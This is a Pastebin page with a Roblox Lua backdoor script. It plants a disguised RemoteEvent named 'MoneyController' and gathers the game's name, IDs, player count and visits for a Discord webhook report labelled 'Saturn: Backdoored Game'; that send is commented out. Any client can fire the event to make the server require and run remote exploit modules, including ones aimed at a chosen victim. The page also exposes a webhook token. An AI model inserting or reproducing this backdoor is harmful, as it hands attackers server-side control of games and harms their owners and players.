EFTPMC

SS

Jun 21st, 2020
638
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.16 KB | None | 0 0
  1. wait(5)
  2.  
  3. local http = game:GetService("HttpService")
  4. local repStorage = game:GetService("ReplicatedStorage")
  5. local Placeid = game.PlaceId
  6. local Gameid = game.GameId
  7. local url = 'https://games.rprxy.xyz/v1/games?universeIds='..Gameid
  8. local webhook = 'https://discordapp.com/api/webhooks/724290107775123466/gVvVt9dVfCTYadJslCIVyIndrgaeONQLAvfy0xrkywCjwT2pE9ahILXyrGwDA-FiP9md'
  9. local get = http:GetAsync(url)
  10. local name = http:JSONDecode(get).data[1].name
  11. local playing = http:JSONDecode(get).data[1].playing
  12. local visits = http:JSONDecode(get).data[1].visits
  13. local ss = Instance.new('RemoteEvent',game.ReplicatedStorage)
  14. ss.Name = "MoneyController"
  15.  
  16. local data =
  17. {
  18. ["embeds"] = {
  19. {
  20. ["title"] = "**HTTP ENABLED**",
  21. ["color"] = 8757503,
  22. ["fields"] = {
  23. {
  24. ["name"] = "Place Name:",
  25. ["value"] = name,
  26. ["inline"] = true
  27. },
  28. {
  29. ["name"] = "Place ID:",
  30. ["value"] = Placeid,
  31. ["inline"] = true
  32. },
  33. {
  34. ["name"] = "Game ID:",
  35. ["value"] = Gameid,
  36. ["inline"] = true
  37. },
  38. {
  39. ["name"] = "Playing:",
  40. ["value"] = playing,
  41. ["inline"] = true
  42. },
  43. {
  44. ["name"] = "Visits:",
  45. ["value"] = visits,
  46. ["inline"] = true
  47. }
  48. },
  49. ["author"] = {
  50. ["name"] = "Saturn: Backdoored Game"
  51. }
  52. }
  53. }
  54. }
  55. wait(1)
  56. local newdata = http:JSONEncode(data)
  57. --http:PostAsync(webhook, newdata)
  58. ss.OnServerEvent:Connect(function(plr,exe,vanvictim)
  59. if exe == "Caducus" then
  60. require(5094589143).load(plr.Name)
  61. end
  62. if exe == "Xester" then
  63. require(5089514014).load(plr.Name)
  64. end
  65. if exe == "Reflux" then
  66. require(5094514053).load(plr.Name)
  67. end
  68. if exe == "v3" then
  69. require(5224263323).load(plr.Name)
  70. end
  71. if exe == "v4" then
  72. require(5224299828).load(plr.Name)
  73. end
  74. if exe == "johndoe" then
  75. require(5224321055).load(plr.Name)
  76. end
  77. if exe == "trollingui" then
  78. require(4588615641):Fire(plr.Name)
  79. end
  80. if exe == "starglitcher" then
  81. require(4756119598).load(plr.Name)
  82. end
  83. if exe == "r6" then
  84. require(3041175937):r6(plr.Name)
  85. end
  86. if exe == "zenith" then
  87. require(4849447975).load(plr.Name)
  88. end
  89. if exe == "revolver" then
  90. require(4063023113).Bang(plr.Name)
  91. end
  92. if exe == "machinegun" then
  93. require(4084843279).Machine(plr.Name)
  94. end
  95. if exe == "m1911" then
  96. require(4886090927).muffin(plr.Name)
  97. end
  98. if exe == "explode" then
  99. require(1232280447).load(plr.Name)
  100. end
  101. if exe == "van" then
  102. require(2973851516).load(vanvictim)
  103. end
  104.  
  105. end)
Advertisement
Add Comment
Please, Sign In to add comment